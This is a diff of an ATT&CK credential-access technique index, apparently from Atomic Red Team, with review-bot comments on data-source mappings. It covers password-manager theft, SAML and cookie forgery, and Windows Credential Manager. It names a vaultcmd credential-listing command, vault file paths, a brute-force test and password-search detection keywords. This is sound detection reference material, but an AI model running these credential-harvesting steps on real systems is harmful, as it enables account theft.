@@ -22015,7 +4096,7 @@ credential-access: - source_name: Cylance Cleaver description: Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017. - url: https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf + url: https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf - source_name: US-CERT TA18-068A 2018 url: https://www.us-cert.gov/ncas/alerts/TA18-086A description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted @@ -22052,31 +4133,31 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-10-19T22:43:45.126Z' + modified: '2021-04-21T16:41:35.269Z' created: '2020-02-11T18:38:22.617Z' x_mitre_contributors: - Microsoft Threat Intelligence Center (MSTIC) x_mitre_data_sources: - - Authentication logs - - Office 365 account logs + - 'User Account: User Account Authentication' + - 'Application Log: Application Log Content' x_mitre_permissions_required: - User x_mitre_detection: Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - Office 365 - - GCP - - Azure AD - - AWS - - Azure - - SaaS + - Google Workspace + - Containers identifier: T1110.001 atomic_tests: - name: Brute Force Credentials of all domain users via SMB 
@@ -22166,6 +4247,70 @@ credential-access: } } Write-Host "End of bruteforce" + T1555.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1555.005 + url: https://attack.mitre.org/techniques/T1555/005 + - source_name: ise Password Manager February 2019 + url: https://www.ise.io/casestudies/password-manager-hacking/ + description: 'ise. (2019, February 19). Password Managers: Under the Hood + of Secrets Management. Retrieved January 22, 2021.' + - source_name: FoxIT Wocao December 2019 + url: https://resources.fox-it.com/rs/170-CAK-271/images/201912_Report_Operation_Wocao.pdf + description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation + Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved + October 8, 2020.' + - source_name: Github KeeThief + url: https://github.com/GhostPack/KeeThief + description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8, + 2021. + - source_name: NVD CVE-2019-3610 + url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610 + description: National Vulnerability Database. (2019, October 9). CVE-2019-3610 + Detail. Retrieved April 14, 2021. + - source_name: Cyberreason Anchor December 2019 + url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware + description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM + A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September + 10, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Password Managers + description: |- + Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. 
Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019) + + Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610) + Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019) + id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-14T19:15:22.416Z' + created: '2021-01-22T16:08:40.629Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: "Consider monitoring API calls, file read events, and processes + for suspicious activity that could indicate searching in process memory of + password managers. \n\nConsider monitoring file reads surrounding known password + manager applications." + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'File: File Access' + - 'Process: Process Access' + - 'Command: Command Execution' + x_mitre_contributors: + - Matt Burrough, @mattburrough, Microsoft + x_mitre_platforms: + - Linux + - macOS + - Windows + atomic_tests: [] T1110.003: technique: id: attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c 
@@ -22217,20 +4362,20 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-10-19T22:43:45.579Z' + modified: '2021-04-06T12:32:47.678Z' created: '2020-02-11T18:39:25.122Z' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace + - Containers x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_detection: |- Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. @@ -22242,8 +4387,8 @@ credential-access: x_mitre_permissions_required: - User x_mitre_data_sources: - - Authentication logs - - Office 365 account logs + - 'User Account: User Account Authentication' + - 'Application Log: Application Log Content' x_mitre_contributors: - Microsoft Threat Intelligence Center (MSTIC) - John Strand @@ -22398,9 +4543,11 @@ credential-access: phase_name: credential-access - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-07-13T21:23:01.370Z' + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-20T20:12:34.422Z' created: '2020-06-26T04:01:09.648Z' - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: - root 
@@ -22409,8 +4556,8 @@ credential-access: Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). x_mitre_data_sources: - - Authentication logs - - File monitoring + - 'File: File Modification' + - 'Logon Session: Logon Session Creation' x_mitre_contributors: - Scott Knight, @sdotknight, VMware Carbon Black - George Allen, VMware Carbon Black @@ -22469,7 +4616,8 @@ credential-access: x_mitre_contributors: - Itzik Kotler, SafeBreach x_mitre_data_sources: - - File monitoring + - 'File: File Access' + - 'Command: Command Execution' x_mitre_detection: Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication @@ -22598,7 +4746,8 @@ credential-access: modified: '2020-03-19T15:32:18.098Z' created: '2020-02-11T18:46:24.434Z' x_mitre_data_sources: - - Process monitoring + - 'Command: Command Execution' + - 'File: File Access' x_mitre_permissions_required: - root x_mitre_detection: To obtain the passwords and hashes stored in memory, processes 
@@ -22613,6 +4762,73 @@ credential-access: x_mitre_platforms: - Linux atomic_tests: [] + T1606.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1606.002 + url: https://attack.mitre.org/techniques/T1606/002 + - source_name: Microsoft SolarWinds Steps + url: https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/ + description: Lambert, J. (2020, December 13). Important steps for customers + to protect themselves from recent nation-state cyberattacks. Retrieved December + 17, 2020. + - source_name: Microsoft SAML Token Lifetimes + url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-lifetimes + description: Microsoft. (2020, December 14). Configurable token lifetimes + in Microsoft Identity Platform. Retrieved December 22, 2020. + - source_name: Cyberark Golden SAML + url: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps + description: 'Reiner, S. (2017, November 21). Golden SAML: Newly Discovered + Attack Technique Forges Authentication to Cloud Apps. Retrieved December + 17, 2020.' + - source_name: Microsoft SolarWinds Customer Guidance + url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ + description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State + Cyber Attacks. Retrieved December 17, 2020. + - source_name: Sygnia Golden SAML + url: https://www.sygnia.co/golden-saml-advisory + description: Sygnia. (2020, December). Detection and Hunting of Golden SAML + Attack. Retrieved January 6, 2021. 
+ object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: SAML Tokens + description: |- + An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML) + + An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users. + + An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. 
This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance) + id: attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-14T14:29:27.290Z' + created: '2020-12-17T15:24:12.240Z' + x_mitre_permissions_required: + - Administrator + x_mitre_data_sources: + - 'Logon Session: Logon Session Creation' + - 'Web Credential: Web Credential Creation' + - 'Web Credential: Web Credential Usage' + x_mitre_contributors: + - Blake Strom, Microsoft 365 Defender + - Oleg Kolesnikov, Securonix + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_detection: |- + This technique may be difficult to detect as SAML tokens are signed by a trusted certificate. The forging process may not be detectable since it is likely to happen outside of a defender's visibility, but subsequent usage of the forged token may be seen. Monitor for anomalous logins using SAML tokens created by a compromised or adversary generated token-signing certificate. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance) Search for logins to service providers using SAML SSO which do not have corresponding 4769, 1200, and 1202 events in the Domain.(Citation: Sygnia Golden SAML) + + Consider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML) + x_mitre_platforms: + - Azure AD + - SaaS + - Windows + - Office 365 + - Google Workspace + atomic_tests: [] T1003.002: technique: external_references: 
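Review bot: the phrase 'specified in the NotOnOrAfter value of the conditions ... element' in the T1606.002 description (hunk -22613) has lost the XML element it names: the surrounding words show an angle-bracket tag sat there, and it looks like the generator's HTML sanitizer dropped it as markup. The sanitizer should escape literal element names in descriptions rather than strip them, since the ATT&CK text routinely quotes SAML and other XML structure. Separately, the x_mitre_detection text lists '4769, 1200, and 1202 events in the Domain' without saying which log emits each, so a reader cannot build the "SAML SSO login without corresponding events" correlation from this text alone; carrying the per-event source from the Sygnia reference into the sentence would make it usable.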
@@ -22650,9 +4866,9 @@ credential-access: x_mitre_contributors: - Ed Williams, Trustwave, SpiderLabs x_mitre_data_sources: - - Process command-line parameters - - PowerShell logs - - Process monitoring + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Access' + - 'File: File Access' x_mitre_permissions_required: - SYSTEM x_mitre_detection: Hash dumpers open the Security Accounts Manager (SAM) on @@ -22807,7 +5023,8 @@ credential-access: modified: '2020-02-17T13:16:53.850Z' created: '2020-02-12T18:56:31.051Z' x_mitre_data_sources: - - Process monitoring + - 'Command: Command Execution' + - 'Process: Process Access' x_mitre_permissions_required: - root x_mitre_detection: Monitor processes and command-line arguments for activity @@ -22856,8 +5073,7 @@ credential-access: modified: '2020-03-25T21:46:46.831Z' created: '2020-02-11T19:14:48.309Z' x_mitre_data_sources: - - Authentication logs - - Windows event logs + - 'Logon Session: Logon Session Metadata' x_mitre_permissions_required: - User x_mitre_detection: "Monitor for anomalous Kerberos activity, such as malformed 
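Review bot: the -22856 hunk collapses two sources ('Authentication logs', 'Windows event logs') into the single 'Logon Session: Logon Session Metadata', yet the -23097 hunk later in this diff maps the identical detection sentence ("Monitor for anomalous Kerberos activity, such as malformed ...") to both 'Active Directory: Active Directory Credential Request' and 'Logon Session: Logon Session Metadata'. Two techniques sharing the same Kerberos detection guidance but not the same data components is either a lost line or an upstream inconsistency; please confirm which before the index is regenerated.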
@@ -22897,10 +5113,10 @@ credential-access: with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) - Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1192) + Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term - access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1527).(Citation: + access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)\n\nAdversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth @@ -22946,7 +5162,7 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-07-14T19:16:30.906Z' + modified: '2021-04-14T17:56:17.311Z' created: '2019-09-04T15:54:25.684Z' x_mitre_is_subtechnique: false x_mitre_detection: |- @@ -22959,17 +5175,17 @@ credential-access: - SaaS - Office 365 - Azure AD + - Google Workspace x_mitre_permissions_required: - User - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_contributors: - Shailesh Tiwary (Indian Army) - Mark Wee - Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services) - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC) x_mitre_data_sources: - - Azure activity logs - - OAuth audit logs + - 'User Account: User Account Modification' atomic_tests: [] T1539: technique: 
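Review bot: 'User Account: User Account Modification' as the sole data source in the -22959 hunk does not match the behaviour the -22897 description gives for this technique. That text says the user is lured into granting an OAuth access token to an adversary-registered application, which is an application consent/authorization event, not a change to the user account object; the 'Application Log: Application Log Content' component used by the -24367 hunk looks closer, and the removed 'OAuth audit logs' entry was at least explicit about it. Verify the mapping against upstream. The link corrections in -22897 (T1192 to T1566/002, T1527 to T1550/001) retire deprecated technique IDs and are correct.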
@@ -22987,7 +5203,7 @@ credential-access: APT framework. Retrieved October 14, 2019. - source_name: Unit 42 Mac Crypto Cookies January 2019 url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ - description: Chen, Y., Hu, W., Xu, Z., et. al.. (2019, January 31). Mac Malware + description: Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019. - description: Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019. url: https://github.com/kgretzky/evilginx2 
@@ -23001,28 +5217,28 @@ credential-access: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Steal Web Session Cookie description: |- - An adversary may steal web application or service session cookies and use them to gain access web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. + An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie) There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as Evilginx 2 and Muraena that can gather session cookies through a man-in-the-middle proxy that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena) - After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1506) technique to login to the corresponding web application. 
+ After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application. id: attack-pattern--10ffac09-e42d-4f56-ab20-db94c67d76ff type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-04-21T15:26:25.584Z' + modified: '2021-04-14T17:57:07.903Z' created: '2019-10-08T20:04:35.508Z' x_mitre_is_subtechnique: false x_mitre_detection: Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory. x_mitre_data_sources: - - File monitoring - - API monitoring - x_mitre_version: '1.0' + - 'File: File Access' + - 'Process: Process Access' + x_mitre_version: '1.1' x_mitre_permissions_required: - User x_mitre_contributors: @@ -23034,6 +5250,7 @@ credential-access: - Windows - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1558: technique: @@ -23097,13 +5314,13 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-09-29T16:16:06.868Z' + modified: '2020-11-05T16:07:04.189Z' created: '2020-02-11T19:12:46.830Z' x_mitre_system_requirements: - Kerberos authentication enabled x_mitre_data_sources: - - Windows event logs - - Authentication logs + - 'Active Directory: Active Directory Credential Request' + - 'Logon Session: Logon Session Metadata' x_mitre_detection: "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting 
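Review bot: the -23001 hunk fixes 'gain access web applications' but leaves two other errors in the same description: 'Session cookies can be used to bypasses some multi-factor authentication protocols' (bypass) in the unchanged context, and 'to login to the corresponding web application' (log in to) on the very line the hunk rewrites. Since this edit already bumps x_mitre_version to '1.1', fixing those upstream in the same pass avoids a second version bump for the same paragraph. The T1506 to T1550/004 link update is correct.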
@@ -23123,7 +5340,7 @@ credential-access: access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored." - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows @@ -23184,9 +5401,9 @@ credential-access: x_mitre_contributors: - John Lambert, Microsoft Threat Intelligence Center x_mitre_data_sources: - - API monitoring - - Process monitoring - - Kernel drivers + - 'Windows Registry: Windows Registry Key Modification' + - 'Driver: Driver Load' + - 'Process: OS API Execution' x_mitre_detection: |- Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior. 
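Review bot: 'Windows Registry: Windows Registry Key Modification' appears in the -23184 hunk as a new data source (in place of 'Process monitoring') with no corresponding detection guidance: the x_mitre_detection text that follows says proxied smart card connections are hard to detect and blend into normal network behaviour, and never mentions a registry change to look for. A data component the detection text does not explain is not actionable; either the text should say what registry modification is expected, or the component should be checked against upstream.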
@@ -23228,24 +5445,24 @@ credential-access: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: credential-access - modified: '2020-10-15T19:39:36.109Z' + modified: '2021-04-12T18:32:33.620Z' created: '2020-02-04T12:47:23.631Z' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace + - Containers x_mitre_permissions_required: - User - Administrator - SYSTEM x_mitre_is_subtechnique: false - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_detection: |- While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information. 
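Review bot: the real change in the -23228 hunk (AWS, GCP and Azure collapsed into 'IaaS'; 'Google Workspace' and 'Containers' added) is buried under a reorder of the whole platform list, which makes the diff hard to review. Because the per-platform indexes and matrices in this commit (linux-index.csv, macos-index.csv, windows-index.csv and their markdown counterparts) are keyed on these platform strings, confirm that 'IaaS' and 'Containers' are recognized by the index generator rather than silently dropped. The x_mitre_version bump to '1.2' is consistent with a platform change.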
@@ -23255,14 +5472,63 @@ credential-access: Additionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives. x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Windows event logs - - File monitoring - - Windows Registry - - Process monitoring - - Process command-line parameters + - 'Command: Command Execution' + - 'File: File Access' + - 'Process: Process Creation' + - 'User Account: User Account Authentication' + - 'Windows Registry: Windows Registry Key Access' + atomic_tests: [] + T1606.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1606.001 + url: https://attack.mitre.org/techniques/T1606/001 + - description: Rehberger, J. (2018, December). Pivot to the Cloud using Pass + the Cookie. Retrieved April 5, 2019. + url: https://wunderwuzzi23.github.io/blog/passthecookie.html + source_name: Pass The Cookie + - source_name: Volexity SolarWinds + url: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ + description: Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds + Compromise to Breach Organizations. Retrieved December 29, 2020. + - source_name: Unit 42 Mac Crypto Cookies January 2019 + url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ + description: Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware + Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019. 
+ object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Web Cookies + description: |- + Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access. + + Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values. + + Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019) + id: attack-pattern--861b8fd2-57f3-4ee1-ab5d-c19c3b8c7a4a + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-01-11T20:31:36.404Z' + created: '2020-12-17T02:14:34.178Z' + x_mitre_data_sources: + - 'Logon Session: Logon Session Creation' + - 'Web Credential: Web Credential Creation' + - 'Web Credential: Web Credential Usage' + x_mitre_detection: Monitor for anomalous authentication activity, such as logons + or other user session activity associated with unknown accounts. 
Monitor for + unexpected and abnormal access to resources, including access of websites + and cloud-based applications by the same user in different locations or by + different systems that do not match expected configurations. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Linux + - macOS + - Windows + - SaaS atomic_tests: [] T1056.003: technique: @@ -23297,7 +5563,7 @@ credential-access: x_mitre_system_requirements: - An externally facing login portal is configured. x_mitre_data_sources: - - File monitoring + - 'File: File Modification' x_mitre_detection: File monitoring may be used to detect changes to files in the Web directory for organization login pages that do not match with authorized updates to the Web server's content. 
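Review bot: the 'Pass The Cookie' reference in the T1606.001 block (hunk -23255) emits its keys as description, url, source_name, while every other external_references entry in this diff puts source_name first. The generator should write reference keys in one fixed order; otherwise each regeneration produces spurious churn on these entries. In the same hunk, replacing 'Azure activity logs' and 'AWS CloudTrail logs' with 'User Account: User Account Authentication' does match the preceding detection sentence about spotting adversary use of credentials they have obtained.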
@@ -23308,6 +5574,78 @@ credential-access: - macOS - Windows atomic_tests: [] + T1555.004: + technique: + id: attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447 + description: |- + Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker) + + The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker. + + Credential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault) + + Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. 
Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager) + + Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault) + name: Windows Credential Manager + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1555.004 + url: https://attack.mitre.org/techniques/T1555/004 + - source_name: Microsoft Credential Manager store + url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store + description: Microsoft. (2016, August 31). Cached and Stored Credentials Technical + Overview. Retrieved November 24, 2020. + - source_name: Microsoft Credential Locker + url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN + description: Microsoft. (2013, October 23). Credential Locker Overview. Retrieved + November 24, 2020. + - source_name: passcape Windows Vault + url: https://www.passcape.com/windows_password_recovery_vault_explorer + description: Passcape. (n.d.). Windows Password Recovery - Vault Explorer + and Decoder. Retrieved November 24, 2020. + - source_name: Malwarebytes The Windows Vault + url: 'https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/ ' + description: Arntz, P. (2016, March 30). The Windows Vault . Retrieved November + 23, 2020. + - source_name: Microsoft CredEnumerate + url: https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credenumeratea + description: Microsoft. (2018, December 5). CredEnumarateA function (wincred.h). + Retrieved November 24, 2020. 
+ - source_name: Delpy Mimikatz Crendential Manager + url: https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials + description: Delpy, B. (2017, December 12). howto ~ credential manager saved + credentials. Retrieved November 23, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2021-04-29T21:00:18.973Z' + created: '2020-11-23T15:35:53.793Z' + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Bernaldo Penas Antelo + - Mugdha Peter Bansode + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + - 'File: File Access' + x_mitre_detection: |- + Monitor process and command-line parameters of vaultcmd.exe for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”).(Citation: Malwarebytes The Windows Vault) + + Consider monitoring API calls such as CredEnumerateA that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager) + + Consider monitoring file reads to Vault locations, %Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\, for suspicious activity.(Citation: Malwarebytes The Windows Vault) + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] collection: T1557.002: technique: 
